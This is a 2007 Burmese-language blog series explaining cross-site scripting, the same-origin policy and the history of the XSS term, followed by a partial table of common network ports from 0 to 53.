  • ထိုအခါတွင် တိုက်ခိုက်သူသည် သားကောင်၏ အင်တာနက်ကြည့်ဆော့ဖ်ဝဲ အတွင်းမှ ဟာကွက်ကိုကောင်းစွာအသုံးချပြီး ၄င်းလိုရာ သင်္ကေတများကို သားကောင်၏ ကွန်ပျုတာအတွင်းသို့ တိတ်တဆိတ် ထည့်သွင်းလိုက်နိုင်သည်။
အားနည်းချက် (၂)

အားနည်းချက် (၂)ကို non-persistent သို့မဟုတ် reflected ပျော့ကွက် ဟုပြောကြသည်။ အမြဲတမ်း ရှိမနေဘဲ အခြေအနေအချို့အပေါ်မူတည်ပြီး ဖြစ်လာသည့် ပျော့ကွက်ဖြစ်သည် ဟု ဆိုနိုင်သည်။ အများဆုံးဖြစ်လေ့ရှိသော ပျော့ကွက်လည်းဖြစ်သည်။
  • ဆာဗာဘက်ခြမ်းရှိ သင်္ကေတများ (Server-site scripts)အနေဖြင့် အင်တာနက်သုံးနေသူ တစ်ဦးမှ ထည့်သွင်းပေးလိုက်သော အချက်အလက်များကို အသုံးပြုပြီး
  • ၄င်းအင်တာနက်သုံးသူအတွက် လိုအပ်သော စာမျက်နှာတစ်ခုကို
  • ဖြေကြားချက်အဖြစ် ချက်ချင်းပြန်လည် ပေးပို့ရလေ့ရှိသည်။
  • အကယ်အားဖြင့် အသုံးပြုသူများ ထည့်ပေးလိုက်သည့် အချက်အလက်များကို စနစ်တကျ စစ်ဆေးခြင်းမပြုဘဲ (Unvalidated User-supplied Data အဖြစ်) လက်ခံမိလိုက်သည့်အခါ၊
  • ၄င်းအချက်အလက်များမှာ ဆာဗာမှ ပြန်လည်ပေးပို့လိုက်သည့် စာမျက်နှာများထဲတွင် ပါဝင် သွားသည်။
  • ဤအခြေအနေမျိုးက အသုံးပြုသူဘက်ရှိ သင်္ကေတများကို အသက်ဝင်ပြောင်းလဲနေသော (Dynamic) စာမျက်နှာတစ်ခု အတွင်းသို့ ထည့်ပေးလိုက်သလို ဖြစ်သွားစေသည်။
စံအဖြစ်ဖော်ပြလေ့ရှိသော ဥပမာမှာ ရှာဖွေရေးဝက်ဘ်ဆိုက်များ (Search Engines) တွင်ဖြစ်သည်။
  • အကယ်၍ တစ်စုံတစ်ယောက်သည် ရှာဖွေရေးဝက်ဘ်ဆိုက်တစ်ခုတွင် ရှာဖွေလိုသည့် စကားလုံးများ ထည့်သွင်းသည့်အခါ
  • HTML မှ အထူးသင်္ကေတအချို့ကို ထည့်သွင်းရှာဖွေလိုက်သည်ဆိုပါစို့၊
  • ထိုအခါတွင် ထိုသူ ထည့်သွင်းရှာဖွေလိုက်သော စာကြောင်းများကို
    • ရရှိလာသော အဖြေများထဲတွင် ပြန်လည်ထည့်သွင်း ဖော်ပြပေးခြင်း သို့မဟုတ်
    • ရှာနေသော အကြောင်းအရာကို အလွယ်တကူ ပြန်လည်ပြင်ဆင်နိုင်ရန်အတွက် ပြန်လည်ဖော်ပြပေးခြင်းမျိုးကို မဖြစ်မနေဆောင်ရွက်ပေးရသည်။
  • အကယ်၍ ထည့်ပေးလိုက်သော အသုံးအနှုံးများအားလုံးတွင် HTML အတွက် အကျုံးမ၀င်သော အချက်အလက်များ ပါလာသည့်အခါ XSS ဂယ်ပေါက် တစ်ခု ဖြစ်လာသည်။




အစပိုင်းတွင် ဤဖြစ်ရပ်မှာ-
  • အင်တာနက်သုံးသူများအနေဖြင့် မိမိ၏အင်တာနက်ကြည့် ဆော့ဖ်ဝဲအတွင်းရှိ စာမျက်နှာများတွင်သာ သင်္ကေတများ ပြန်လည်ထည့်သွင်းလိုက်သလိုမျှသာ ဖြစ်နေသောကြောင့်
  • ဆိုးဆိုးရွားရွား ပြဿနာတစ်ရပ်အနေဖြင့် ပေါ်လာခဲ့ခြင်း မရှိပေ။
  • သို့ရာတွင် တိုက်ခိုက်မှုလုပ်ဆောင်လိုသူတစ်ဦးအနေဖြင့် Social Engineering နည်းပညာအချို့ကို အသုံးပြုပြီး
    • အင်တာနက်သုံးသူတစ်ဦးထံသို့
    • ၄င်းအတွက် အလုပ်လုပ်ပေးမည့် သင်္ကေတများ ပါဝင်နေသော စာမျက်နှာတစ်ခုထံသို့ ရောက်ရှိစေမည့် အင်တာနက်လိပ်စာတစ်ခုကို ဖွင့်ကြည့်မိစေရန် စည်းရုံးသိမ်းသွင်း နိုင်စေသည့် အခွင့်အရေး ရရှိစေနိုင်လာသည်။
(Social Engineering - မသိနားမလည်သူ၊ အင်တာနက်သုံးသူများ၏ အားနည်းချက်ကို အခွင့်ကောင်းယူပြီး ထိုသူများထံမှ အရေးကြီးသော ကိုယ်ရေးအချက်အလက်များ ငွေကြေးဆိုင်ရာအချက်အလက်များ လှည့်ပတ်ရယူပြီး အမြတ်ထုတ်ခြင်း - သီးခြားဖော်ပြပါမည်)

အားနည်းချက် (၃)

အားနည်းချက် (၃)ကို သိမ်းဆည်းထားသော (သို့) အမြဲရှိနေသော (သို့) ဒုတိယအဆင့် ပျော့ကွက်၊အားနည်းချက် ဟု ပြောလေ့ ရှိကြသည်။ အစွမ်းအထက်ဆုံးသော တိုက်ခိုက်မှုအမျိုးအစားများ ဖြစ်ပေါ်စေနိုင်သည်။
ဥပမာတစ်ခု အနေဖြင့်
  • အင်တာနက်ပေါ်ရှိနေရာ (သို့) ဆာဗာ (သို့) ဖိုင်သိုလှောင်သိမ်းဆည်းရေးစနစ် တစ်ခုခု အတွင်းသို့ အသုံးပြုနေသူတစ်ဦးက (ပထမလူ-တိုက်ခိုက်သူ) အချက်အလက်များကို ပေးပို့ ထည့်သွင်းသိမ်းဆည်းလိုက်သည်။
  • နောက်တစ်ချိန်တွင် အခြားသော အသုံးပြုသူတစ်ဦးက (ဒုတိယလူ-သားကောင်) ၄င်းစာမျက်နှာကို ဖွင့်ကြည့်လိုက်မိသည့်အခါတွင် တိုက်ခိုက်သူဆင်ထားသော ထောင်ချောက်ထဲသို့ ရောက်ရှိသွားရတော့သည်။
  • အထူး စံထားပြသနိုင်သည့် ဥပမာတစ်ရပ်မှာ Online Message Boards များဖြစ်သည်။
  • ၄င်းနေရာများသည် အခြားသော ကြည့်ရှုသူများဖတ်ရှုနိုင်ရန်အတွက် HTML သင်္ကေတများကို ထည့်သွင်းနိုင်ရန် လမ်းဖွင့်ပေးထားခြင်း ကြောင့်ဖြစ်သည်။
ဤအားနည်းချက်များမှာ အများအားဖြင့် အခြားသောအမျိုးအစားများထက် သိသိသာသာ အကျိုးသက်ရောက်မှုဖြစ်စေသည်။ အကြောင်းမှာ တိုက်ခိုက်သူတစ်ဦး အနေဖြင့် သင်္ကေတ (Script) အချို့ထည့်သွင်းပေးလိုက်ရုံသာ ဖြစ်ပြီး အခြားသော သားကောင် အမြောက်အများကို တိုက်ခိုက်နိုင်သောကြောင့် ဖြစ်ပေသည်။

သားကောင်၏ ကွန်ပျုတာများအတွင်းသို့ သင်္ကေတများ ထည့်သွင်းတိုက်ခိုက်ပုံ နည်းစနစ်များ (Methods of Injection) မှာ အမျိုးမျိုး ပြောင်းလဲနေနိုင်သည်။
  • တိုက်ခိုက်သူတစ်ဦးသည် အထက်တွင်ဖော်ပြထားခဲ့သော ပျော့ကွက်၊ ဟာကွက်များ သားကောင်၏ ကွန်ပျုတာပေါ်တွင် ဖြစ်ပေါ်လာစေရန်အတွက် အင်တာနက်အသုံချဆော့ဖ်ဝဲ (Web Application) တစ်ခုခုကို အသုံးပြုရန် လိုချင်မှ လိုမည်ဖြစ်သည်။
  • အင်တာနက် အသုံးချဆော့ဖ်ဝဲ (အီးမေးလ် ၊ System log စသည့်) အရာတစ်ခုခုမှ လက်ခံရရှိလိုက်သည့် (တိုက်ခိုက်သူတစ်ဦးမှ ထိန်းချုပ်ထားနိုင်ချေရှိနေသော) မည်သည့် အချက်အလက်မဆိုသည် အသက်ဝင် နေသော စာမျက်နှာတစ်ခုအဖြစ် (Dynamic page) ပြန်လည်ဖော်ပြရမည့်နေရာတွင်
  • ရှိသင့်ရှိထိုက်သော သက်ဆိုင်ရာ သင်္ကေတများဖြင့် အပြည့်အ၀ ပါရှိနေရမည် ဖြစ်သည်။
  • အကယ်၍ ပါရှိမနေပါက ရလာဒ်အနေဖြင့် XSS ဆိုင်ရာ ဂယ်ပေါက် တစ်ခု ဖြစ်ပေါ်လာမည် ဖြစ်ပေသည်။
အခြေအနေအမျိုးမျိုးကြောင့် အခုဖော်ပြထားတာတွေကို အတော်လေးအချိန်ယူ ဘာသာပြန်လိုက်ရပါတယ် ... နည်းပညာ တစ်ခုဖြစ်နေတာရော ကိုယ်နဲ့ဝေးတဲ့ အကြောင်းအရာတစ်ခုဖြစ်နေတာကြောင့်ရော အတော်လေး ခေါင်းစားခဲ့ပါတယ် ပညာလည်း အတော်ရလိုက်ပါတယ် ... အခုဖော်ပြထားတာတွေက မပြည့်စုံသေးပါဘူး စာကြောင်းတွေက ရှည်နေတဲ့ အတွက် သည်းခံဖတ်ပေးစေချင်ပါတယ် ... နောက်ထပ် ဆက်ပြီး ဘယ်လို အတိုက်ခိုက်ခံရနိုင်တာလဲ ... ဘယ်လို အကာအကွယ်တွေ လုပ်မလဲ ဆိုတာတွေကို နမူနာတွေ ရုပ်ရှင်တွေနဲ့ ရှာဖွေ ဖော်ပြသွားမှာပါ ....

ဆက်လက်ဖော်ပြပါမည် ....

Jun 29, 2007

XSS သို့မဟုတ် Cross-Site Scripting - အသုံးအနှုံးများ


အသုံးအနှုံးများ
အစောပိုင်းကာလတွေတုန်းကတော့
CSS လို့အတိုကောက် ပြောရင် Cross-Side Scripting ရဲ့ အားနည်းချက်တွေကို ပြောတယ်ဆိုတာ
နားလည်ခဲ့ကြပါတယ်။ ဒါပေမယ့်လည်း နောက်ပိုင်းမှာ ဆက်လက်ထွက်ပေါ်လာတဲ့ -

  • Cascading-Style Sheets - အင်တာနက်စာမျက်နှာတွေ ရေးသားတဲ့အခါ အဆင်အပြင် ပိုပြီးကြည့်ကောင်းအောင် အသုံးပြုရတဲ့ ဘာသာစကားတစ်မျိုး နဲ့
  • Content Scrambling System - စီးပွားဖြစ်ထုတ်လုပ်တဲ့ ဒီဗွီဒီတွေမှာအထဲမှာပါဝင်တဲ့ အကြောင်းအရာတွေကို အခြားသူတွေ အလွယ်တကူ ကြည့်လို့မရအောင် ဖန်တီး(Encrypt) လုပ်ထား၊ ရောမွှေထားတဲ့နည်းစနစ်
တွေရဲ့ အတိုကောက် စာလုံးတွေနဲ့ မှားယွင်းစရာ ဖြစ်လာပါတယ် ...

Steve Champeon

XSS ဆိုတဲ့ အတိုကောက်စကားလုံးကို ပထမဆုံးစပြီးသုံးခဲ့တဲ့ သူကတော့ Steve Champeon ဆိုတဲ့ပုဂ္ဂိုလ်ဖြစ်ပါတယ်။ သူဟာ webmonkey.com ဆိုတဲ့ အင်တာနက်စာမျက်နှာတွေ ရေးသားတည်ဆောက်တဲ့ နည်းလမ်းတွေအကြောင်း အစကနေ အဆုံးအထိ အမျိုးမျိုးရှင်းပြထားတဲ့ Online Tutorial ၀က်ဘ်ဆိုဒ်မှာ "XSS, Trust, and Barney" ဆိုတဲ့ ခေါင်းစဉ်နဲ့ Cross-Side Scripting အကြောင်းကို XSS ဆိုတဲ့ အခေါ်အဝေါ်နဲ့ စတင်ရေးသားခဲ့တာပါ။ နောက်ပိုင်းမှာ လုံခြုံရေးနည်းပညာ အသိုင်းအ၀ိုင်းတစ်ခုလုံးက ဒီအပြောင်းအလဲကို အလျင်အမြန်ပဲ လက်ခံအသုံးပြုခဲ့ကြပါတယ်။

အခုအချိန်မှာဆိုရင် Cross-Side Scripting ကို CSS ရယ်လို့ အလွန်အသုံးနည်းသွားပါပြီ။
သုံးထားခဲ့ပြီးသား အင်တာနက်စာမျက်နှာအချို့မှာပဲ ကျန်နေပါတော့တယ် ...

(နောက်လာမယ့် အကြောင်းအရာတွေက ပညာရပ်ပိုင်းဆိုင်ရာ အခက်အခဲလေးတွေရှိနေလို့ အချိန်ပေး လေ့လာ ဘာသာပြန်နေရတဲ့ အတွက် ဒီနေရာမှာပဲ ခဏလေး ရပ်ထားပါ့မယ် ... နောက်နေ့ မှာ XSS ရဲ့ပျော့ကွက်တွေကို အသုံးချပြီး တိုက်ခိုက်ခံရနိုင်တဲ့နည်းလမ်းတွေကို ဆက်လက်ဖော်ပြပေးပါ့မယ် ...)

  • webmonkey.com ဆိုတဲ့ ဆိုဒ်လေးကိုလည်း သွားလေ့လာကြည့်ကြဖို့ web development အကြောင်းလေ့လာချင်တဲသူတွေကို တိုက်တွန်းချင်ပါတယ် ...
ဆက်လက်ဖော်ပြပါမည် ....


Jun 26, 2007

XSS သို့မဟုတ် Cross-Site Scripting - မူလနေရာတူညီခြင်း


မူလနေရာတူညီခြင်း

အဓိကအားဖြင့်တော့ အင်တာနက်ကြည့်ဆောဖ့်ဝဲတွေဟာ လက်ရှိနေရာ(စာမျက်နှာ)ကနေ အပြင်ဘက်တစ်နေရာကို ခုန်ကူးရတဲ့ အခါမှာ လုံခြုံမှုရရှိစေဖို့အတွက် Same origin policy ဆိုတဲ့နည်းလမ်းတစ်ခုကို အသုံးပြုကြပါတယ်။ JavaScript မှာအသုံးများပါတယ်။ ဒီနည်းလမ်းကို သုံးလိုက်တဲ့ အတွက်တစ်နေရာကနေ နောက်တစ်နေရာကို သွားရတော့မယ်ဆိုရင် စိတ်ချလက်ချ သွားလို့ရပါတယ်။

ဒီနည်းလမ်းလေးရဲ့ အလုပ်လုပ်ပုံလေးကို အောက်မှာ ဇယားလေးနဲ့ ရှင်းပြထားပါတယ်။
တစ်နေရာကနေ နောက်တစ်နေရာပြောင်းအကူးအပြောင်းမှာ
Domain တွေအချင်းချင်း Prorocol တွေအချင်းချင်း တူနေမှ အပြောင်းအလဲကို ဆက်လုပ်နိုင်အောင် လုပ်ပေးတဲ့နည်းဖြစ်ပါတယ် …
ဒီနည်းကြောင့် ကောက်ကျစ်စဉ်းလဲတဲ့ ၀က်ဘ်ဆိုက်တစ်ခုဟာ အင်တာနက်ကြည့်ဆော့ဖ်ဝဲရဲ့ ဖွင့်ထားတဲ့ အခြား window တစ်ခုအတွင်းမှာ ရှိနေတဲ့ အရေးကြီးတဲ့ အချက်အလက်တွေကို JavaScript အသုံးပြုပြီး မခိုးယူနိုင်မှာ ဖြစ်ပါတယ် …. (ကွန်ပျုတာထဲက အချက်အလက်တွေကို ပြောတာမဟုတ် …)

Origin ဆိုတဲ့ အသုံးအနှုံးက မူလစာမျက်နှာ နဲ့ နောက်ထပ်သွားရမယ့် စာမျက်နှာတွေကြားမှာ
အသုံးပြုထားတဲ့ domain name, protocol နဲ့ port တွေ တူနေရမယ်လို့ ဆိုလိုပါတယ်။ အင်တာနက် စာမျက်နှာတွေကြားမှာ အဲဒီအချက် သုံးချက်တူညီမှုရှိနေတာကို မူလနေရာတူညီခြင်း Same Origin လို့ဆိုလိုပါတယ်။ ဒီလိုတူနေမှ စာမျက်နှာတစ်ခုကနေ နောက်တစ်ခုပြောင်းရတဲ့အခါ ပါသွားမယ့် အချက်အလက်အချို့ အတွက် စိတ်ချရတဲ့ သဘောပါ။

အထက်က ဇယားလေးကို သေသေချာချာ လေ့လာလိုက်ရင်
..www.example.com/dir/page.html.. ဆိုတဲ့နေရာကနေ တခြားနေရာတွေကို သွားပြထားတာ ဖြစ်ပါတယ် -

  • အပေါ်ဘက်နှစ်ခုကတော့ Same Origin ဖြစ်ပြီးလို့ဆက်သွားလို့ရပြီး
  • အောက်ဘက်ကလေးခုမှာ protocol မတူတာ၊
  • host (domain) အမည်မတူတာ၊
  • port မတူတာ တွေကြောင့် အကူးအပြောင်း မလုပ်ပေးတာ မြင်ရမှာ ဖြစ်ပါတယ် …

ဒီသဘောလေးက ပြင်ပလောကမှာလည်း အတူတူပါပဲ။ တစ်နယ်တည်းသားအချင်း၊ တစ်တန်းတည်းသား အချင်းချင်း၊ တစ်အိမ်တည်းသားချင်း၊ တစ်ကျောင်းတည်းထွက်ချင်း အစ ရှိတဲ့ မူလနေရာ (Same Origin) တူတဲ့သူ အချင်းချင်း စိတ်ချလက်ချ ပေါင်းလို့ရတဲ့ သဘောအတိုင်းပါပဲ ….
(ချွင်းချက်လေးတွေ ရှိနိုင်တာကို ခဏဖယ်ပြီး စဉ်းစားတာပါ…)

Netscape ကသူ့ရဲ့ JavaScript မှာ အဲဒီနည်းလမ်းလေးကို စတင်လိုက်တဲ့အချိန်ကစပြီးတော့
အင်တာနက်အသုံးပြုသူတွေကို ကောက်ကျစ်စဉ်းလဲတဲ့ website တွေရဲ့ အန္တရာယ်ကနေ အကာအကွယ်ပေးနိုင်အောင် အင်တာနက်ကြည့် ဆော့ဖ်ဝဲ အမျိုးမျိုးနဲ့ အင်တာနက်အသုံးပြုသူတွေအတွက်ရေးပေးရတဲ့ (client-side scripting) ပရိုဂရမ် ဘာသာစကားအမျိုးမျိုးမှာ အလားတူနည်းလမ်း တွေကို သုံးပြီး အကာအကွယ်ပေးလာ ကြပါတယ်။

ယေဘုယျအားဖြင့်တော့ Cross-site Scripting ဆိုတာဟာ အင်တာနက် စာမျက်နှာတွေရဲ့ ပျော့ကွက်တွေ၊ အားနည်းချက်တွေကို မသမာသူတွေက ရှာဖွေပြီး သူတို့ လိုချင်တဲ့ နေရာ၊ လမ်းကြောင်းပေါ်ကို ရောက်အောင် ဆွဲခေါ်သွားတဲ့ နည်းလမ်းတွေပါပဲ ….
မသမာသူတစ်ဦးဟာ အခြားသော အင်တာနက်နေရာ (Domain) များမှာ တည်ရှိအသုံးပြုနေတဲ့ စာမျက်နှာများအတွင်းကို ကောက်ကျစ်ဆိုးရွားတဲ့ သင်္ကေတတွေ (scripts) ကို နည်းအမျိုးမျိုးနဲ့ ရှာဖွေထည့်သွင်းပြီး ၊ စာမျက်နှာတစ်ခုအတွင်းမှာပါတဲ့ အရေးကြီးတဲ့ ကိုယ်ရေးကိုယ်တာအကြောင်းအရာတွေ၊ session cookie နဲ့ အခြားသော အကြောင်းအရာတွေကို တစ်ဆင့်ပြီးတစ်ဆင့် ရရှိ အသုံးပြုသွားနိုင်တယ် ဆိုတာလေးကို သေသေချာချာလေး နားလည်ထားဖို့ အရေးကြီးပါတယ် …

အခုလို သိထားမယ်ဆိုရင်-

  • လင့်ခ် တွေ့တိုင်း ကလစ်လုပ်တာမျိုး၊
  • ပုံ လှလှလေး (လှလှလေး :P) တွေ့လို့ ကလစ်လုပ်တာမျိုး ၊
  • စိတ်ဝင်းစားလောက်စရာ စာကြောင်းလေးတွေ့လို့ ကလစ်လုပ်တာမျိုးတွေကို လုပ်မိတော့မယ်ဆိုရင် အနည်းနဲ့ အများ သတိထားနေမိတော့မှာ သေချာပါတယ် …..

အောက်က ဗီဒီယိုလေးကို ပြန်ကြည့်လိုက်ပါဦးလား ...
ပိုပြီး သဘောပေါက်သွားတာပေါ့ ….



ဆက်လက်ဖော်ပြပါမည် ....


Jun 25, 2007

XSS သို့မဟုတ် Cross-Site Scripting - နောက်ခံသမိုင်းကြောင်း


Cross site scripiting ကို အတိုကောက် CSS လို့ပဲ ခေါ်တာပါပဲ။
ဒါပေမယ့် အခုတော့ မသုံးတော့ပါဘူး။

Netscape ဆော့ဖ်ဝဲ ကုမ္မဏီဟာ Java Script ဘာသာစကားကို ပထမဆုံးမိတ်ဆက်လိုက်တဲ့ အချိန်က web server တစ်ခုကနေ အင်တာနက်ကြည့် ဆော့ဖ်ဝဲ တွေဆီကို အလုပ်လုပ်နိုင်တဲ့ သင်္ကေတ (executable code) တွေပို့လွှတ်နိုင်တဲ့အတွက် လုံခြုံရေးဆိုင်ရာ စွန့်စားမှုတစ်ရပ် ဆိုတာကို သိခဲ့ကြ ပါတယ်။

ဒါနဲ့ ပါတ်သက်တဲ့ အဓိက သော့ချက်ပြဿနာတစ်ရပ်ကတော့ user တွေက တပြိုင်တည်းမှာ browser ၀င်းဒိုးတွေ အများကြီးကို ဖွင့်တဲ့အချိန်ပါဘဲ။ အချို့ အခြေအနေတွေမှာ စာမျက်နှာ တစ်ခုမှာပါနေတဲ့ Script တွေကအခြားစာမျက်နှာတစ်ခု သို့မဟုတ် အခြားစာမျက်နှာထဲက အရာဝတ္ထု တစ်ခုခုဆီကို လှမ်းပြီး ဆက်သွယ်တာကို အခြေအနေအရ ကိုယ်ကိုယ်တိုင်က ခွင့်ပြုပေးရတာမျိုး ရှိတတ်ပါတယ်။

အထူးသဖြင့် မလွှဲမရှောင်သာခွင့်ပြုနေရတာတွေ ကတော့ -

  • email တွေထဲမှာပါလာတဲ့ လိပ်စာတွေ
  • တခြားပြင်ပ စာမျက်နှာတစ်ခုကို လှမ်းဖွင့်ရမယ့် link (external link) တွေ
  • ကလစ်လုပ်ပြီးကြည့်မှ မြင်ရမယ့် ရုပ်ပုံတွေ
  • ဒေါင်းလုဒ် ချမှရမယ့် ဖိုင်တွေ - ဖြစ်ပါတယ်


ဒါပေမယ့် ဒီလို လုပ်တဲ့အခါမျိုးမှာ အထူးသတိထားဖို့ လိုအပ်ပါတယ်။
ကောက်ကျစ်စဉ်းလဲတဲ့ ၀က်ဘ်ဆိုက် တစ်ခုခုက ကိုယ့်ဆီကနေ သူတို့လိုချင်တဲ့ အချက်အလက်တွေကို ဒီနည်းနဲ့ ဆွဲယူသွားနိုင်လို့ ပဲဖြစ်ပါတယ်။ ဘယ်လို လုပ်သွားတာလဲ နည်းနည်းလေ့လာ ကြည့်ကြ ပါစို့လား ။

ကျွန်တော်တို့တတွေ လင့်ခ်တစ်ခုခုကို (ဥပမာ - www.examplewebsite.com) ကလစ် လုပ်လိုက်ပြီဆိုတာနဲ့ ကျွန်တော်တို့ရဲ့ အင်တာနက်ကြည့်တဲ့ ဆော့ဖ်ဝဲက အဲဒီလိပ်စာအတိုင်း လိုက်သွားပြီးတော့ အဲဒီလင့်ခ်နဲ့ဆိုင်တဲ့ စာမျက်နှာ၊ ရုပ်ပုံ အစရှိတဲ့ အရာတစ်ခုခု (သို့မဟုတ်) အများကို ဖွင့်ခွင့်ပေးဖို့ Servrer ကနေတောင်းဆိုတဲ့အလုပ် ကိုလုပ်ပါတယ်။

အဲဒီအခါမှာပဲ အဲဒီ Server နဲ့ ကျွန်တော်တို့ကွန်ပျုတာ အဆက်အသွယ်ရနေပြီ ဖြစ်ပါတယ်။ ကိုယ်ကတော့ လင့်ခ်လေးတစ်ခုကို ကလစ်လုပ်လိုက်တာပါဘဲ .... ဒါပေမယ့် နောက်ကွယ်က ကိုယ်မမြင်ရတဲ့နေရာမှာ အပြောင်းအလဲတွေ အများကြီးဖြစ်သွားပါတယ်။ အရမ်းသတိထားရမယ့် အလုပ်တစ်ခုပါ။
အဲဒီအချိန်မှာပဲ Server ကပေးပို့လိုက်တဲ့ အရာတွေက ကိုယ့်ရဲ့ အင်တာနက်ကြည့် ဆော့ဖ်ဝဲပေါ်မှာ အလုပ်လုပ်နေပြီဖြစ်ပါတယ် ...
ပိုပြီးရှင်းရှင်းလင်းလင်း မြင်ချင်တယ်ဆိုရင်တော့ အင်တာနက်လိပ်စာတစ်ခုကို ဖွင့်နေတုန်းမှာ ကိုယ့်ရဲ့ အင်တာနက်ကြည့်ဆော့ဖ်ဝဲရဲ့ Status bar ကို စောင့်ကြည့်နေလိုက်ပါ …
  • connecting to www.servername.com ….
  • waiting for www.servername.com ....
  • transferring dada from www.servername.com ….
  • opening page www.servername.com ….
  • Sendig request to www.servername.com ……
  • receiving items from www.servernames.com ….
အစရှိတဲ့ ဖော်ပြချက်မျိုးတွေ တစ်ခုပြီးတစ်ခု မြင်ရမှာဖြစ်ပါတယ် ...

တကယ်လို့ ဒုက္ခပေးမယ့် အရာတွေ ကိုယ့်ကွန်ပျုတာထဲက အချက်အလက်တွေ နှိုက်ထုတ် ခိုးယူတော့မယ့် အရာတွေပါလာပြီဆိုရင်လည်း အလုပ်စနေပြီ ဖြစ်ပါတယ် ….
ကိုယ့်ဘက်က တောင်းဆိုလိုက်ပြီဆိုကတဲက Server မှာ ဘယ်နေရာကတောင်းဆိုနေတာလဲ၊ ဘာဆော့ဖ်ဝဲ သုံးထားလဲ အစရှိတဲ့ ကျွန်တော်တို့ရဲ့ အချက်အလက်တစ်ချို့ ပါသွားပြီဖြစ်ပါတယ်

ဒီအကြောင်းအရာလေးနဲ့ ဆင်တူဖြစ်ရပ်လေးကို Symantec ကနေအခုလို ဗီဒီယိုလေးနဲ့ ရှင်းပြထားတာ ရှိပါတယ်။ လေ့လာကြည့်ကြပါ ခင်ဗျာ ….



ဆက်လက်ဖော်ပြပါမည် ....

Jun 24, 2007

XSS သို့မဟုတ် Cross-Site Scripting


ဒီရက်ပိုင်းတွေမှာ ကျွန်တော် XSS သို့မဟုတ် Cross-Site Scripting ဆိုတာလေးကို
လေ့လာနေမိပါတယ်။ အတော်လေး စိတ်ဝင်စားစရာကောင်းတဲ့
အကြောင်းအရာ တစ်ခုလည်းဖြစ်ပါတယ်။
ဒါဟာ -

  • ကွန်ပျုတာသုံးနေတဲ့ သူတွေရဲ့ မသိနားမလည်မှု၊ ဗဟုသုတ နည်းပါးမှုတွေကို
  • အခွင့်အရေးတစ်ခုလို အသုံးချတတ်တဲ့ ကောက်ကျစ် စဉ်းလဲတဲ့ Web User တွေက
  • တခြားသော မသိနားမလည်သူတွေကြည့်ရှုမည့် Web စာမျက်နှာများ အတွင်းမှာ
  • သူ့တို့အတွက် အလုပ်လုပ်ပေးမယ့် သင်္ကေတ Code တွေကို တိတ်တဆိတ်ထည့်သွင်းပေး လိုက်နိုင်တဲ့ Web Application တွေမှာ တွေ့ရတတ်တဲ့
  • ကွန်ပျုတာတွေရဲ့ လုံခြုံရေးနဲ့ သက်ဆိုင်တဲ့ နည်းပညာတစ်ခု ဖြစ်ပါတယ်။
အဲဒီ သင်္ကေတတွေထဲကအချို့ကို ဥပမာအနေနဲ့ ဖော်ပြရရင် -
  • HTML သင်္ကေတတွေနဲ့
  • Client-side script တွေ ပါဝင်ပါတယ် ။
Client-side script ဆိုတာကတော့ -
  • web page တွေကို ကြည့်ရှုမယ့် user တွေရဲ့ အင်တာနက်ကြည့်ဆော့ဖ်ဝဲ - Browser ပေါ်မှာ အလုပ်လုပ်အောင် ဖန်တီးရေးသားထားသော၊
  • user တွေရဲ့ ဆောင်ရွက်ချက်တွေ၊ နေရာဒေသတွေ၊ ပတ်ဝန်းကျင်အခြေအနေတွေ အပေါ်မူတည်ပြီး web page ထဲက အကြောင်းအရာများကို အလိုက်သင့် ပြောင်းလဲ နေအောင် ဖန်တီးရေးသားထားသော
  • အင်တာနက် စာမျက်နှာများအတွင်းက ကွန်ပျုတာ ပရိုဂရမ် အတန်းအစား တစ်ခုဖြစ်ပါတယ် ...
  • အများအားဖြင့် HTML, Java Script (client-side Java Script), Images, ActiveX, Java ဘာသာစကားမျိုးတွေ နဲ့ အခြားသော အင်တာနက်နည်းပညာတွေကို သုံးပြီး ရေးလေ့ရှိကြပါတယ် ...
ဒီလိုတိုက်ခိုက်မှုတွေမှာ ဘာတွေပါဝင်လဲဆိုတော့ -
  • Phishing - လို့ခေါ်တဲ့ user name တွေ , password တွေနဲ့ credit card ဆိုင်ရာ အသေးစိတ်အချက်အလက်များ စတဲ့ အရေးကြီးတဲ့ အချက်အလက်တွေကို တိတ်တဆိတ် နှိုက်ထုတ်ယူဆောင်ခြင်း
  • Browser exploit - လို့ခေါ်တဲ့ အင်တာနက်ကြည့် Browser ရဲ့ ဆော့ဖ်ဝဲ ဆိုင်ရာ အားနည်းချက်တစ်ခုခုကို အသုံးချပြီး - Browser ဆော့ဖ်ဝဲကို ရပ်တန့်ပစ်လိုက်ခြင်း၊ user ကွန်ပျုတာထဲက ဖိုင်တွေကို ဖတ်ရှု ရေးသားခြင်း၊ ဗိုင်းရပ်စ်များထည့်သွင်းခြင်း နဲ့ ထောက်လှမ်းရေးဆော့ဖ်ဝဲ ( spyware ) များ ထည့်သွင်းလိုက်ခြင်း
အစရှိတဲ့ အရာတွေပါဝင်ပါတယ် ...

ဆက်လက်ဖော်ပြပါမည် ....

May 28, 2007

Computer များရဲ့ဂယ်ပေါက်များ(၁)


ဒီနေ့တော့ port နံပါတ် ၀ ကနေ ၈၀ အထိ အကြောင်းကို ဖော်ပြသွားမှာပါ..
ဒီ port တွေကို Common ports တွေလို့လဲ ခေါ်ပါသေးတယ်။ အသေးစိတ်ကိုတော့ အောက်မှာမြင်ရမှာပါ...

Port

Description

status

0/TCP,UDP

Reserved; do not use (but is a permissible source port value if the sending process does not expect messages in response)

Official

1/TCP,UDP

TCPMUX (TCP port service multiplexer)

Official

5/TCP,UDP

RJE (Remote Job Entry)

Official

7/TCP,UDP

ECHO protocol

Official

9/TCP,UDP

DISCARD protocol

Official

11/TCP,UDP

SYSTAT protocol


13/TCP,UDP

DAYTIME protocol

Official

17/TCP,UDP

QOTD (Quote of the Day) protocol

Official

18/TCP,UDP

Message Send Protocol

Official

19/TCP,UDP

CHARGEN (Character Generator) protocol

Official

20/TCP

FTP - data port

Official

21/TCP

FTP - control (command) port

Official

22/TCP,UDP

SSH (Secure Shell) - used for secure logins, file transfers (scp, sftp) and port forwarding

Official

23/TCP,UDP

Telnet protocol - unencrypted text communications

Official

25/TCP,UDP

SMTP - used for e-mail routing between mailservers E-mails

Official

26/TCP,UDP

RSFTP - A simple FTP-like protocol

Unofficial

35/TCP,UDP

QMS Magicolor 2 printer

Unofficial

37/TCP,UDP

TIME protocol

Official

38/TCP,UDP

Route Access Protocol

Official

39/TCP,UDP

Resource Location Protocol

Official

41/TCP,UDP

Graphics

Official

42/TCP,UDP

Host Name Server

Official

43/TCP

WHOIS protocol

Official

49/TCP,UDP

TACACS Login Host protocol

Official

53/TCP,UDP

